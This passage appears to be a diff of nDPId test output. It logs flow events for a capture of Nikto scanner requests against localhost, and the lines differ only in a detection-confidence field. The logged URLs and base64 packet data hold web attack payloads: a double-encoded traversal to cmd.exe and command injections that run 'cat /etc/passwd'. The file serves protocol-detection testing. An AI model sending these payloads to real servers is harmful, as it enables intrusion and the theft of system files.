00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277525,"pkt":"AAAAAAAAAAAAAAAACABFAAD8VQBAAEAG5vl\/AAABfwAAAcW8H5BNImwcgJPNrYAYAED+8AAAAQEICp1m\/j2dZv48R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277526,"pkt":"AAAAAAAAAAAAAAAACABFAAD8wPBAAEAGewl\/AAABfwAAAcW+H5C+lvgMjxfu9IAYAED+8AAAAQEICp1m\/j6dZv4+R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277527,"pkt":"AAAAAAAAAAAAAAAACABFAADOGxtAAEAGIQ1\/AAABfwAAAcXAH5ABqiP992RjDoAYAED+wgAAAQEICp1m\/j+dZv4\/R0VUIC9tc2FkYy9zYW1wbGVzL2FkY3Rlc3QuYXNwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277528,"pkt":"AAAAAAAAAAAAAAAACABFAADdW\/pAAEAG4B5\/AAABfwAAAcXCH5D1lWMf6eFgloAYAED+0QAAAQEICp1m\/kCdZv5AR0VUIC9hdGhlbmFyZWcucGhwP3Bhc3M9JTIwO2NhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDA2NjcpDQoNCg=="} -01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}} +01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277534,"pkt":"AAAAAAAAAAAAAAAACABFAADO4OJAAEAGW0V\/AAABfwAAAcXEH5B2FdgIExVLAoAYAED+wgAAAQEICp1m\/kWdZv5FR0VUIC9jZC1jZ2kvc3NjZF9zdW5jb3VyaWVyLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277535,"pkt":"AAAAAAAAAAAAAAAACABFAADEalJAAEAG0d9\/AAABfwAAAcXGH5Ak\/VK4qoIqcIAYAED+uAAAAQEICp1m\/kedZv5HR0VUIC9jZ2ktYmluL2hhbmRsZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA2OSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277536,"pkt":"AAAAAAAAAAAAAAAACABFAADsKwtAAEAGEP9\/AAABfwAAAcXIH5DuMhPiKIF7BYAYAED+4AAAAQEICp1m\/kidZv5IR0VUIC9jZ2ktYmluL2hhbmRsZXIvbmV0c29uYXI7Y2F0IC9ldGMvcGFzc3dkfD9kYXRhPURvd25sb2FkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}} +01097{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277537,"pkt":"AAAAAAAAAAAAAAAACABFAADIaaFAAEAG0ox\/AAABfwAAAcXKH5CUxlF4c7zrSYAYAED+vAAAAQEICp1m\/kmdZv5JR0VUIC9jZ2ktYmluL3dlYmRpc3QuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzEpDQoNCg=="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 